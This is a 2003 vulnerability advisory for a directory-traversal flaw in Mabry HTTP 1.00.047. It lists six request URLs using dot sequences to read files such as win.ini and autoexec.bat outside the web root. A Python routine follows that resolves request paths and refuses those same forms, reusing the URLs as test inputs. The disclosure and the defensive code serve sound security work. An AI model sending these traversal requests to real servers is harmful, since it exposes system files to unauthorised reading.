Directory traversal in Mabry HTTP allows file access outside HTML root, risking root compromise.
`MABRY HTTP Directory Traversal Vulnerabilities
Release Date:
July 10, 2003
Severity:
Root Compromise
Systems Affected:
Mabry HTTP 1.00.047
Description:
A directory traversal vulnerability in the product allows remote attackers to view the
content of files that reside outside the bounding HTML root directory.
When an attacker sends a request to the server in one of the following forms:
http://127.0.0.1/........../windows/win.ini
http://127.0.0.1/........./autoexec.bat
http://127.0.0.1/.../.../.../.../.../.../scandisk.log
http://127.0.0.1/../../../../../../../../../autoexec.bat
http://127.0.0.1/../../../../../../../../windows/win.ini
http://127.0.0.1/.html/............/autoexec.bat
The server will return the requested files.
Disclaimer
---------
The author(s) does(do) not have any responsibility for any malicious
use of this advisory or proof of concept code. The code and the
information provided here are for educational purposes only.
The author(s) will NOT be held responsible for any direct or
indirect damages caused by the information or the code
provided here.
Acknowledgements
----------------
Vulnerability found and tested by dr_insane
`
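A server-side check that refuses the request forms listed in the advisory, as an added example that is not part of the original advisory or of the Mabry product's code. It goes beyond the listed forms by also handling percent-encoded dots and backslash separators. The document root `/srv/www/html`, the name `resolve_request`, and the rule that any path segment made only of two or more dots is refused are assumptions.

```python
import posixpath
from urllib.parse import unquote, urlsplit

DOC_ROOT = "/srv/www/html"  # hypothetical document root (assumption)

# Request forms quoted in the advisory above.
PAGE_REQUESTS = [
    "http://127.0.0.1/........../windows/win.ini",
    "http://127.0.0.1/........./autoexec.bat",
    "http://127.0.0.1/.../.../.../.../.../.../scandisk.log",
    "http://127.0.0.1/../../../../../../../../../autoexec.bat",
    "http://127.0.0.1/../../../../../../../../windows/win.ini",
    "http://127.0.0.1/.html/............/autoexec.bat",
]


def resolve_request(url, doc_root=DOC_ROOT):
    """Map a request URL to a path under doc_root, or return None to refuse it."""
    path = unquote(urlsplit(url).path)      # decode %2e and similar exactly once
    if "\x00" in path:
        return None
    segments = []
    for seg in path.replace("\\", "/").split("/"):  # treat "\" as a separator too
        seg = seg.strip()
        if seg in ("", "."):
            continue                         # empty or current-directory segment
        if set(seg) == {"."}:
            return None                      # "..", "...", ".........." and longer
        segments.append(seg)
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Defence in depth: the normalized result must still sit under the root.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for url in PAGE_REQUESTS + ["http://127.0.0.1/docs/./guide.html"]:
        print(url, "->", resolve_request(url) or "REFUSED")
```

On a live filesystem, also resolve symbolic links (for example with `os.path.realpath`) before the containment check.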